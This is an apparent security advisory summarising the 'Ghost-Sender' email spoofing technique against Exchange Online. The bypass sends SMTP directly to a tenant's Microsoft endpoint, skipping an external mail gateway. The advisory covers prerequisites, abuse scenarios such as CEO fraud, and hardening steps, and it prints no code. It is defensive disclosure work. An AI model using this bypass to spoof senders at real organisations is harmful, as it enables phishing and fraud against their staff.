Author: Lucas Dodgson, Tobias Oberdörfer, Robin Hilber
Published: June 9, 2026
Source: https://labs.infoguard.ch/posts/ghost-sender/
Summary
InfoGuard Labs disclosed “Ghost-Sender,” a universal email spoofing technique against Microsoft Exchange Online. When a tenant routes inbound mail through a third-party gateway via an external MX record, an attacker can bypass that gateway entirely by speaking SMTP directly to the tenant’s *.mail.protection.outlook.com endpoint. Exchange Online accepts these messages regardless of SPF, DKIM, or DMARC results, allowing arbitrary sender spoofing — including internal addresses — with delivery straight to the inbox. According to the researchers, under half of environments with an external MX record have a mitigation applied, and over 20% of scanned bug-bounty domains using Exchange Online appear vulnerable.
Technical Details
Many organizations point their domain’s MX record at a third-party spam filter or mail security gateway rather than directly at Microsoft, expecting all inbound mail to be filtered before it reaches Exchange Online. However, the tenant’s Microsoft-side acceptance endpoint (<tenant>.mail.protection.outlook.com) remains reachable from the public internet. By connecting an ordinary SMTP client — the researchers demonstrate a single PowerShell one-liner — directly to that endpoint, an attacker delivers mail that never traverses the external gateway. The root cause is that, in the default configuration, Exchange Online does not validate the sender’s authentication when accepting this direct mail flow and does not reject it based on the failing SPF, DKIM, or DMARC posture of the spoofed domain. Microsoft characterizes this behavior as an architectural limitation of “Direct Send” rather than a vulnerability, so no CVE has been assigned. The issue also affects on-premises Exchange deployments running in hybrid mode.
Impact
An attacker requires only the target domain (with an external MX record), knowledge of the tenant’s mail.protection.outlook.com hostname, and an SMTP client. With these, they can spoof arbitrary internal or external senders and have messages delivered directly to recipients’ inboxes. Because the mail appears as legitimate internal traffic, Exchange Online may resolve profile pictures for spoofed internal senders, increasing credibility. Practical abuse includes targeted phishing, CEO/business-email-compromise fraud, and fake billing notices (for example, purporting to come from billing@microsoft.com). The affected products are Microsoft Exchange Online and on-premises Exchange in hybrid mode.
Mitigation
No patch is available, as Microsoft treats the behavior as expected. InfoGuard and Microsoft recommend hardening the tenant configuration:
- Configure a Partner Organization inbound connector that uses wildcard matching with IP address and/or TLS certificate validation, so only the legitimate gateway can submit mail.
- Add a mail flow (transport) rule at priority 0 that quarantines unauthenticated inbound email.
- Disable Direct Send where it is not required.
- Verify exposure using the researchers’ testing tool at ghost-sender.com, and review tenant posture with Microsoft’s Configuration Analyzer and preset security policies.
References
- Ghost-Sender – Universal Email Spoofing against Exchange Online
- Ghost-Sender — vulnerability testing tool
- Microsoft: Direct Send vs sending directly to an Exchange Online tenant
- Microsoft: Introducing more control over Direct Send in Exchange Online
- Microsoft: Change Optics Report (public preview)
- Microsoft: Inbound connector FAQ
- Microsoft: Anti-phishing policies — spoof protection and sender DMARC policies
- Microsoft Defender: Configuration Analyzer
- Microsoft Defender: Preset security policies
- InfoGuard Labs on GitHub
- InfoGuard — Penetration Testing & Red Team services